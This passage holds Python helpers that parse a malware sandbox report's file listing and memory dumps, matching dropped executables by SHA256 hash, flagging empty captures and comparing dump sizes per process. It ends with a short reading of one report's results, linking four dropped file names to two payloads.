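EMPTY_SHA256 = hashlib.sha256(b'').hexdigest()  # hash of zero bytes: content was never captured


def normalize_path(path):
    """Fold the 'C:\\...' and '\\...' spellings of one path together, case-insensitively."""
    return re.sub(r'^(?:[A-Za-z]:)?\\', '', path).lower()


def parse_files_section(text):
    """Return {sha256: {'paths': set, 'hashes': {algo: hexdigest}}} from a pasted Files listing."""
    index = {}
    path, rows = None, {}

    def flush():
        sha = rows.get('SHA256')
        if path and sha:
            entry = index.setdefault(sha, {'paths': set(), 'hashes': {}})
            entry['paths'].add(normalize_path(path))
            entry['hashes'].update(rows)

    for line in text.splitlines():
        line = line.strip()
        if not line or MEM_LINE.match(line):
            continue  # memory dumps carry no hash rows; handled separately below
        m = HASH_ROW.match(line)
        if m:
            rows[m.group(1)] = m.group(2).lower()
        else:
            flush()  # a non-table line starts the next file entry
            path, rows = line, {}
    flush()
    return index


def find_aliases(index):
    """Hashes listed under more than one path: the same binary dropped or copied under a new name."""
    return {sha: sorted(e['paths']) for sha, e in index.items() if len(e['paths']) > 1}


def empty_artifacts(index):
    """Entries whose SHA256 is that of zero bytes, e.g. a named pipe the sandbox opened but read nothing from."""
    return sorted(p for sha, e in index.items() if sha == EMPTY_SHA256 for p in e['paths'])


def memory_regions(text):
    """(pid, start, end, size) for every memory dump line."""
    out = []
    for line in text.splitlines():
        m = MEM_LINE.match(line.strip())
        if m:
            start, end = int(m.group(3), 16), int(m.group(4), 16)
            out.append((int(m.group(1)), start, end, end - start))
    return out


def largest_region_per_pid(text):
    """Biggest dumped range per PID; identical sizes across PIDs usually mean the same image was mapped."""
    best = {}
    for pid, start, end, size in memory_regions(text):
        if size > best.get(pid, (0, 0, 0))[2]:
            best[pid] = (start, end, size)
    return best


if __name__ == '__main__':
    idx = parse_files_section(SAMPLE_FILES)
    for sha, paths in find_aliases(idx).items():
        print(sha[:16], '->', ' == '.join(paths))
    print('empty captures:', empty_artifacts(idx))
    for pid, (start, end, size) in sorted(largest_region_per_pid(SAMPLE_FILES).items()):
        print(f'pid {pid}: 0x{start:X}-0x{end:X} ({size // 1024} KiB)')
```

On the report's own data this collapses `mainPannel.exe` and `C:\Program Files\Google\Chrome\updater.exe` to one hash, and `GC.exe` and `SubDir\CasNic.exe` to another, so the "Executes dropped EXE" rows are two payloads under four names. The dumped range for PID 2540 (mainPannel.exe) and PID 1996 (updater.exe) has the same size, 0x388E000 bytes, which is consistent with the same image being mapped in both. The `\??\PIPE\srvsvc` entry carries the empty-input hash, so it records a pipe open, not file content.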